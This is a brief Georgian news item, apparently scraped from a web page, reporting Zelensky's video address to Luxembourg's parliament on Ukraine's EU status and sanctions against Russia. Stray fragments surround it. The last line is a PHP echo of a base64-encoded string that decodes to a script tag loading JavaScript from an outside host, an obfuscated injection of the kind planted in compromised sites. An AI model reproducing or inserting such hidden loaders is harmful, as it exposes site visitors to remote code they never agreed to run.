celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ ლუქსემბურგის პარლამენტში ვიდეომიმართვისას განაცხადა, რომ მისი ქვეყანა თავს უკვე ევროკავშირის წევრად თვლის. ამის შესახებ ინფორმაციას Deutsche Welle ავრცელებს.
 
„უკრაინა უკვე გახდა ევროკავშირის დე ფაქტო წევრი. მე მჯერა, რომ უკრაინა თავისი ქმედებებით უკვე აჩვენებს, რომ ევროპულ კრიტერიუმებს აკმაყოფილებს“, - განაცხადა ზელენსკიმ.
 
ზელენსკიმ ასევე თქვა, რომ რუსეთის წინააღმდეგ ევროკავშირის ახალი სანქციები უნდა დაწესდეს. ჩართვისას მან რუსეთის პრეზიდენტი ვლადიმერ პუტინი სახელით არ მოიხსენია, მაგრამ მასზეც ისაუბრა.
 
„თქვენ ამ პიროვნებას ევროპული ღირებულებების განადგურებაში ხელი უნდა შეუშალოთ. თუ ჩვენ ერთად ამ ადამიანის გაჩერება ვერ მოვახერხეთ, მაშინ ეს არის ბნელი საათები, რომლებიც ჩვენ მეორე მსოფლიო ომში გამოვცადეთ“, - აღნიშნა ზელენსკიმ პუტინზე საუბრისას.
 
690
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");